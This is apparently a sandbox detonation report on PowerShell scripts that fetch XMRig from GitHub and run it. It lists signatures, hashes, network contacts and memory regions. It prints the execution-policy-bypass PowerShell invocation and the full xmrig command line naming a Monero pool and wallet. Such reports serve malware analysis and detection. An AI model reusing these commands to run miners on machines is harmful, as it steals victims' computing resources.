memory/4320-73-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-74-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-75-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-76-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-77-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-78-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-79-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-80-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-81-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-82-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-83-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-84-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-85-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-86-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-87-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-88-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-89-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-90-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-91-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-92-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-93-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-94-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-95-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-96-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-97-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-98-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-99-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-100-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-101-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-102-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-103-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-104-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-105-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-106-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-107-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-108-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-109-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-110-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-111-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-112-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-113-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-114-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-115-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-116-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:35
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4948 wrote to memory of 3264 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4948 wrote to memory of 3264 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.192.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4948-5-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/4948-4-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/4948-6-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/4948-7-0x000001DF1CE70000-0x000001DF1CE92000-memory.dmp
memory/4948-10-0x000001DF1D020000-0x000001DF1D096000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lu5nku1r.ujj.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4948-25-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/4948-48-0x000001DF1D0A0000-0x000001DF1D0B2000-memory.dmp
memory/4948-61-0x000001DF1D010000-0x000001DF1D01A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3264-90-0x000001BDC35F0000-0x000001BDC3610000-memory.dmp
memory/3264-91-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/4948-92-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/3264-93-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/4948-94-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/3264-95-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-96-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-97-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-98-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-99-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-100-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-101-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-102-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-103-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-104-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-105-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-106-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-107-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-108-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-109-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-110-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-111-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-112-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-113-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-114-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-115-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-116-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-117-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-118-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-119-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-120-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-121-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-122-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-123-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-124-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-125-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-126-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-127-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-128-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-129-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-130-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-131-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-132-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-133-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-134-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-135-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-136-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-137-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-138-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-139-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-140-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-141-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-142-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-143-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-144-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-145-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-146-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-147-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-148-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-149-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-150-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-151-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-152-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-153-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-154-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-155-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:36
Platform
win10v2004-20240508-en
Max time kernel
1684s
Max time network
1693s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/3452-0-0x00007FFED0E03000-0x00007FFED0E05000-memory.dmp
memory/3452-1-0x000001F871280000-0x000001F8712A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmelzcau.ids.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3452-11-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/3452-12-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/3452-13-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/3452-14-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/3452-15-0x00007FFED0E03000-0x00007FFED0E05000-memory.dmp
memory/3452-16-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/3452-17-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:44
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4988 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ovvykolq.ems.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-61-0x000001E918380000-0x000001E91838A000-memory.dmp
memory/4988-48-0x000001E918520000-0x000001E918532000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:48
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 588 wrote to memory of 372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 588 wrote to memory of 372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
